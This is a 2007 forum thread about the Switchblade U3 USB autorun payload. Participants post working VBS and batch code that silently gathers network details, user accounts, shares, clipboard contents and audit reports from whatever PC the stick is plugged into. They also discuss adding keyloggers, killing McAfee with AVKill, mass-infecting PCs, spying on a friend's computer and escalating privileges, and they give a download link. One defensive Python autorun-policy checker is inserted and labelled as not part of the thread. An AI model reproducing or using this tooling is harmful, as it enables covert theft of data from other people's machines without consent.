tijgert Posted November 10, 2007

Any chance for an update of the Config tool with an extra check box with which you can enable/disable your own addition? I'd like to add a keylogger remote install package, but make it nicely switchable from the config menu like all the other items. I can modify the needed scripts to add my tool and check for the *.dat file, but I can't alter the Config tool.

Having said that, I have a feature suggestion. We don't all remember to hold the shift key when inserting our U3s in our PCs and we don't all want to disable autorun all the time. I'm not happy with 'accidentally' infecting myself every time and would like an option (a simple check box would do) that makes installing-hacks run only once or every time. An alternate method I think would be to modify the Go.bat to delete the 2.dat and 3.dat files after the execution of the appropriate section so that upon reinsertion the flag now shows not to install the hacks (but that kills the option to mass infect PCs). Any comments?

chiquita4011 Posted November 11, 2007

> Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below...
> 1. Extract the ISO to the root of your flash drive.
> 2. Edit the AUTORUN.INF
> 3. Run SBConfig from your flash drive.

After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working?

GonZor Posted November 11, 2007

> > Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below...
> > 1. Extract the ISO to the root of your flash drive.
> > 2. Edit the AUTORUN.INF
> > 3. Run SBConfig from your flash drive.
>
> After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working?

No, sbconfig is only used to customize the payload (e.g. turn options on or off). If you remove sbconfig.exe the payload will still function the way it is set up, but I recommend keeping a copy of sbconfig somewhere in case you need to configure the payload again.

detox420 Posted November 12, 2007

GonZor, I was just wondering if you knew anything about ".job" files or their file format or anything. A few of my buddies are working on a Windows hack that works in a limited account, and so far it works, just crashes in a limited account. Anyways, the hack uses the "System" Login Exploit using an At Command etc. If you would like to help us work on this, send me a message.

GonZor Posted November 12, 2007

> GonZor, I was just wondering if you knew anything about ".job" files or their file format or anything. A few of my buddies are working on a Windows hack that works in a limited account, and so far it works, just crashes in a limited account. Anyways, the hack uses the "System" Login Exploit using an At Command etc. If you would like to help us work on this, send me a message.

You can't use the AT command from a limited account; that would be why it is crashing. Basically you are trying to elevate your privileges using an exploit that needs elevated privileges... You need to find another way to elevate your privileges.

detox420 Posted November 12, 2007

It would be much easier for me to explain this to you via messenger, but if you're uncomfortable with that I will attempt to elaborate. Basically, since you can't do an At command in limited user, we made a ".job" already made to do that and detect the time and run a minute later. The problem is that the scheduled task creates and it looks completely legit and you can see it in the scheduled tasks folder and such, but it never executes, not even as an admin. And I believe that we need to know about ".job" files. I can send you sources and such if you believe you can help us. I have many messengers you can reach me at.

beakmyn Posted November 13, 2007

I made some updates to your scripts, nice job btw.

go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better than crashing and posting a dialog to the user victim. I've included only what's different, otherwise I'm over the max characters for message:

```
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
On Error Resume Next
strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)
For Each objDrive in colDrives
  'ignore floppy drives - reserved by BIOS if they don't exist
  If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
      If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then
        strfd = objDrive.Driveletter & ":"
      End If
      If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCgo.bat") Then
        strU3 = objDrive.Driveletter & ":"
      End If
  End if
Next
If objFSO.FileExists(strfd & "SystemSRCPL.dat") Then
   objShell.Run strU3 & "SystemSRCgo.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False
End If
If objFSO.FileExists(strfd & "SystemSRCU3.dat") Then
   objShell.Run ".LaunchU3.exe -a"
End If
```

go.bat

I've added nircmd to grab the clipboard contents and winaudit (google it)

```
:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off
If %computername%.==. SET computername=computer
If %username%.==. SET username=None
SET fd=%1System
SET U3=%2SystemSRC
CD %U3% >NUL

:: SET LOG PATHS
    IF NOT EXIST %fd%Logs%computername% (
        MD %fd%Logs%computername%
        )
    SET logdir=%fd%Logs%computername%
    SET log="%fd%Logs%computername%%computername%-[%3-%4].log"
    SET tmplog="%fd%Logs%computername%%computername%_TEMP.log"
    SET include="%fd%SRCInclude
    SET /p eipurl=<"%1SystemSRCIncludeEIP.dat"
    SET /p winaud=<"%1SystemSRCIncludewinaud.dat"

:: PAYLOAD
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

IF EXIST %include%0.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +          [System info]           + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
        IPCONFIG /all >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +              Shares               + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
         net share >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +              Users                + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
         net user >> %log% 2>&1
    )

IF EXIST %include%19.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +            Clipboard              + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
         .nircmd.exe clipboard addfile %log%
    )

IF EXIST %include%20.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +            Win Audit              + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
         ECHO WinAudit saved to %logdir% >> %log% 2>&1
         .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txt >> %log% 2>&1
         ECHO. >> %log% 2>&1
    )

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
:End
    EXIT
```

winaud.dat

rtfm for winaudit to see what the switches do

```
/r=oxutn /o=PDF /m=CA Security Scan
```

Also for the EIP I use http://checkip.dyndns.org/

You could use regular expressions to remove the extra HTML

```
<html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>
```

but it gets the job done and uses a public server.

Take a look at nircmd if you haven't already; it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)

tijgert Posted November 14, 2007

Hmm.. this is really good stuff, nice job on improving on what already seems to be an Ace tool. I'll attempt to implement all the changes myself and add my own little keylogger to it as well. Any chance you might upload your full scripts somewhere for us to leech? (I as a noob at scripts and zero knowledge of vbs would like to see if I got the implementation right... I'm learning).

detox420 Posted November 14, 2007

I'm testing the mod now, feedback soon, and if anyone can help me with my ".job" problem please let me know.

sablefoxx Posted November 14, 2007

Nice code

tijgert Posted November 14, 2007

Oh bollocks... I tried to implement the changes but I just get stuck at what to leave in from the old code and what to erase :-( Makes me feel ignorant... any chance for that upload somewhere then? :?

beakmyn Posted November 15, 2007

http://www.frontiernet.net/~wardriver/U3CUSTOM.zip

That's got just the scripts and .dat files needed. Items in the FD folder need to go on the flash partition sans the FD folder.

tijgert Posted November 16, 2007

Thanks a bunch. I got pretty far on my own but definitely needed your help. I like the multitone beeps, I just had three single 2600Hz chimes. Now I also think I figured out how to make the payload run files from the FD, something my keylogger will be most grateful for :) The only other changes I made was add a search history backup and make most outputs in HTML format (looks so much better). The only (Nir)tool that didn't have command line options was the favorites backup... but I mailed him asking for an update to that (don't know any other way to steal favorites). You're a sport!

beakmyn Posted November 16, 2007

I'd like to see that HTML output. I'm working on that now myself.

tijgert Posted November 16, 2007

Actually most Nirtools have the /shtml switch to do that for you. Just replace the /stext for /shtml. Even an Uebernoob like me could do that 8-)

beakmyn Posted November 17, 2007

Oh I thought you were working on something more complicated. I'm in the process of formatting the output using the WinAudit HTML output style with tables and anchors, etc.

tijgert Posted November 17, 2007

Complicated even is too complicated to spell for me :-? Na, as a real noob I can copy stuff, copy paste stuff and delete stuff. I can think, but I cannot create. Another small addition I made (read: copy paste) is add avkill to the package. McAfee keeps bugging me when trying to spy, so it's gotta go. avkill now runs first, next time I'm at my friend's place (where I also got the drive error btw) I'll see if I can beat McAfee on the draw and check if the drive issue is gone. Should be another two hurdles taken I think...

beakmyn Posted November 17, 2007

Seeing as batch files are wonderful things in of themselves, this is 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why? Because vbs is much more powerful than batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

GonZor Posted November 18, 2007

> Seeing as batch files are wonderful things in of themselves, this is 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why? Because vbs is much more powerful than batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

Firstly, nice work on modifying the payload. Secondly, the way I see the USB Hacks section is a community project where people build upon others' ideas to create something bigger and better. I doubt anyone would object to you rewriting the batch files in vbs. Once you're done let me know and with your approval it may make its way into the payload. Also if you get stuck I can help.

HarshReality Posted November 18, 2007

If I could just get around the av issue it would be perfect. Also I have been wondering about the code.. I noticed one of the other projects had the run disabled if "safety.txt" was on the C drive (goto end) and I can't see that anywhere in the code (or am I missing it). Hold in mind guys, I'm just getting the hang of this.

beakmyn Posted November 19, 2007

I'll post once it's finished and tested. GonZor, I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using native Windows tools then the AV/OS is none the wiser.

@HarshReality

The AV is typically killed using AVKill but some antivirus are immune or will countermeasure.

Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script, not the switchblade script.

The 2 ways I know to keep from scanning yourself:

1. checks for presence of file "X"
2. checks computername/user against list stored in file on U3

Personally I would go with 1, less of a paper trail, lest you lose your switchblade, but requires access to machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting U3 drive.

Monkeymook Posted November 20, 2007

Ok. I've been trying to get this to work for about a week or two now, and progress is null. I'm not a complete newb at using the payloads, just installing them. Now, I get all the files extracted, and replace the u3custom ISO in the bin folder from GonZor's package, then run the customizer. It formats the drive with the files on the CD partition and I eject the drive and replace it, then I move the SBConfig file to the Flash part, and run it. It works. Now my issue is, when the Switchblade is used on another computer, it doesn't run. It still works through the Amish technique, and I end up with a successful log, but is there some extra file that was left out of a zip file, or something?

trustme Posted November 20, 2007

Do you have the payload on (there's a button to turn the whole payload on and off at once) and hidden and system files viewable on the machine you're accessing the logs on (you're looking in the system folder for the logs, right?)? If you have those all correct, can you provide me with the following information?

Your PC:
- OS
- Version of the payload and sbconfig

Test PC:
- OS
- Autorun disabled (Yes/No)

Monkeymook Posted November 20, 2007

Yep. All the files are set up in the correct structure. Hidden files are shown, and logs are in the system folder.

My PC:
- Windows XP MCE 2005
- Um...define payload. As in Universal Customizer? Then in that case, 1.0.0.8
- SBConfig: 2.0.0.18

Test PC:
- Windows XP Home
- Autorun enabled

In the start of this thread, I know there is a post showing all the files that are needed for this to run. Now I'm sure that post is outdated, as new files may have been made, but I noticed a "Start.bat" file in that list that needs to be in the original version of that payload. Should I have that?

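
Added example, not part of the thread or the project's code: the "Autorun disabled (Yes/No)" question above comes down to the Windows NoDriveTypeAutoRun policy bitmask. This Python check decodes that value and reports whether AutoRun is still enabled for the two drive types a U3 stick presents (emulated CD-ROM and removable flash); the function names and the XP fallback value 0x91 are assumptions of this example.

```python
import sys

POLICY_KEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
VALUE_NAME = "NoDriveTypeAutoRun"
XP_DEFAULT = 0x91  # assumption: stock Windows XP value when no policy is set

# A set bit means AutoRun is DISABLED for that drive type.
DRIVE_TYPE_BITS = {
    0x01: "unknown",
    0x02: "no_root_dir",
    0x04: "removable",
    0x08: "fixed",
    0x10: "network",
    0x20: "cdrom",
    0x40: "ramdisk",
    0x80: "reserved",
}
# A U3 stick shows up as an emulated CD-ROM plus a removable flash partition.
U3_RELEVANT = ("cdrom", "removable")


def effective_mask(hklm, hkcu, default=XP_DEFAULT):
    """HKLM overrides HKCU; fall back to the default if neither is set."""
    if hklm is not None:
        return hklm
    return hkcu if hkcu is not None else default


def decode(mask):
    """Map each drive type to True when AutoRun is disabled for it."""
    return {name: bool(mask & bit) for bit, name in DRIVE_TYPE_BITS.items()}


def exposed_types(mask, relevant=U3_RELEVANT):
    """Drive types in `relevant` on which AutoRun is still enabled."""
    state = decode(mask)
    return [name for name in relevant if not state[name]]


def read_policy():
    """Windows only: return (hklm, hkcu) values, None where unset."""
    import winreg
    found = []
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, POLICY_KEY) as key:
                data, _ = winreg.QueryValueEx(key, VALUE_NAME)
            if isinstance(data, bytes):  # value may be stored as REG_BINARY
                data = int.from_bytes(data[:4], "little")
            found.append(int(data) & 0xFF)
        except OSError:
            found.append(None)
    return tuple(found)


if __name__ == "__main__":
    # Off Windows, fall back to constructed input: no policy in either hive.
    hklm, hkcu = read_policy() if sys.platform == "win32" else (None, None)
    mask = effective_mask(hklm, hkcu)
    gaps = exposed_types(mask)
    print(f"effective mask 0x{mask:02X}; AutoRun enabled on: {gaps or 'none'}")
```

A mask of 0xFF disables AutoRun for every drive type, while the XP fallback of 0x91 leaves both CD-ROM and removable drives exposed.
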
blub Posted November 20, 2007

Hi, this was actually the first payload I ever tried. I was a bit afraid, cuz I read that it is supposed not to be possible to install it through VM systems. But the only available XP system was my VM. And I got it to run without a single problem. I am so happy that I just wanted to let you know :-) and that I really really like your work!! THUMBS UP!!

What really feels handy is the option to turn U3LP on/off and turn the payload on/off. Would it also be possible to turn the U3 functionality on/off?? The idea behind it is that I ran into a situation where I simply wanted to use my stick as a storage stick but the host PC didn't even recognize my stick, cuz of the restricted accounts or whatever they did to it, that didn't allow the U3 partition to run, which stopped the whole stick from being recognized. Cuz of me being more into economics than writing code, I don't know if it is possible.
